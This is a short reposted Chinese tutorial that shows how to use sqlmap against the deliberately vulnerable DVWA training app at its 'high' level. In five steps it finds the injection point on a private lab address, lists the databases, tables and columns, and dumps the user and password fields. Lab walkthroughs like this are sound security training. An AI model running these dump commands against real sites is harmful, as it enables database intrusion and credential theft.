DVWA 之high級別sql注入

本文轉載自查看原文 2019-07-13 01:48 1101 mysql

Sqlmap 高級注入，抓包，然后保存數據到1.txt

1.判斷注入點

sqlmap -r /root/1.txt -p id  --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/"  --level  2  #level是注入的等級，默認是1

2.爆數據庫

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs

3.爆表

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa"

4. 爆字段

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users"

5.爆帳號密碼

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dump -D "dvwa" -T "users" -C "user,password"

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 dvwa中med級別和high級別的sql注入 DVWA 之medium級別sql注入 DVWA-SQL注入-low，medium，high DVWA靶場（六、SQL注入）編寫DVWA暴力破解High級別的Python腳本基於dvwa環境下級別為low的SQL手工注入教程 SQL注入之DVWA平台測試mysql注入 DVWA的文件上傳漏洞（high） DVWA－全等級SQL注入（顯注） DVWA中low級的sql注入漏洞的簡單復現